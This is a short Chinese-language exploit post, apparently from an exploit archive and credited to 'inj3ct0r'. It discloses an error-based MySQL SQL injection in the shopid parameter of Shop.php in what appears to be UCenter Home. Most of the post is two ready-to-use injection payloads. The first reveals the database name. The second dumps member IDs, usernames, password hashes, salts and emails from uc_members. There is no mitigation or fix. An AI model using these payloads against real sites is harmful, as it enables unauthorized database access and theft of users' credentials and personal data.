作者: inj3ct0r
漏洞文件 : Shop.php
漏洞表现: ?ac=view&shopid=
漏洞类型 : SQL Injection (MySQL Error Based)
利用POC:
1、查询出UC_HOME的DATABSE:
and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
2、根据1查询出的DATABSE(替换XXOO_UC_DB),进一步注入出member信息:
and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0×27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
trackback